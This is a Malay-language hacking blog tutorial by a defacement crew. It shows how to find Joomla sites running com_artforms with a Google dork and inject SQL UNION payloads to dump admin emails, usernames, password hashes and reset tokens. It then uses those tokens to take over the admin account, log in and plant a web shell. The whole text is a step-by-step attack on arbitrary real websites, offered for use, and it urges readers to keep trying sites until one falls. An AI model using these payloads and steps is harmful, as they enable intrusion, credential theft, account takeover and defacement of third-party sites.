Deface web dengan menggunakan method com_artforms

Hai .. bertemu lagi kita ye .. hahax xD

Assalamualaikum dan selamat pagi =)

Kita masih lagi dalam cara untuk deface website joomla .

Selain , com_media , com_fabrik . Masih mempunyai banyak exploit untuk kita deface website joomla antaranya ialah com_artforms yang akan aku ajar sekarang . Jadi , dengan menggunakan exploit ini . Kemungkinan korang boleh upload shell korang =)

Ok . Jom mulakan .

Macam biasa , masukkan dork com_artforms ni dekat google :

inurl:"option com_artforms"

Dan carilah salah satu website di dalam pencarian itu =)

Lepas dah jumpa , korang letak exploit ni di belakang website itu :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

Contoh :

www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

Lepas tekan ENTER , korang akan nampak email daripada website tersebut seperti dalam gambar ini . 

Korang copy email tu dan letak di dalam notepad =)

Dah ? Ok . Sekarang korang masuk ke tempat reset password untuk reset password admin tu :D

Buka tab baru . masukkan link website tadi dan letak : 

/index.php?option=com_user&view=reset

Nanti website tu akan jadi macam dalam gambar ni =)

Sebelum nak reset password , korang kena letak email . Ok , korang ambik email yang korang copy tadi tu dan letak dekat kotak email tu dan tekan send =)

Selepas korang dah tekan send , nanti diorang akan cakap diorang perlukan username dan token yang korang dapat dekat email tu :) 

Macamana nak tahu token dan username tu :O ?

Ikut step mudah ni =)

Bukak tab baru dan ambik link website tadi tu lagi sekali . Dan letak ni kat belakang website itu :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

Nanti akan muncul kod token dan username seperti ini 
admineda7d6142fac40a533b56407a4617371

Yang warna merah itu adalah username manakala yang warna biru itu pula adalah token dia =)

Tapi kalau korang jumpa kod macam ni 

admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$

Jangan membazir masa , quit je laman web tu :3

Sekarang , korang pergi balik ke tempat isi username dan token tu dan letak token dan username yang korang jumpa tadi dan klik ENTER .

Kini , form untuk kita reset password itu sudah muncul .  Apa lagi .. Reset lah password orang itu dan letaklah password yang korang nak untuk masuk ke web admin tu . Contohnya : ShadowForce

Jika berhasil , korang masuk ke dalam panel admin site itu pula dan log in lah guna email yang korang jumpa tadi dan password yang baru sahaja korang tukar tadi =)

Untuk mengetahui joomla site admin , korang cuma perlu letak /administrator sahaja di belakang site itu seperti www.site.com/administrator

Lepas dah log in tu . Kalau dapat masuk jangan tunggu2 lagi . Tanam lah shell korang dekat situ dan jangan lupa kreditkan Black CyberSec Crew x) Kalau tak dapat .. Carilah website lain :( Teruskan usaha sehingga korang berjaya =)

Sekian sahaja tutorial daripada saya .

Keep calm and smile always =) !

- ShadowForce -

Greets :

./Black Eagle | ./TiadaNama | ./BackSpaceRC | ./TidakDiketahui | ./Godam Crewz | Semua member Black CyberSec Crew dan crew-crew yang lain =) |

• Facebook
• Twitter
• GPlus
• Reddit
• Digg
• Linkedin
• Stumbleupon
• Technorati
• Delicious
• Friendfeed
• Pinterest

Title : Deface web dengan menggunakan method com_artforms

Labels :

Author : ./ShadowForce

Rating: 100% based on 10 ratings. 5 user reviews.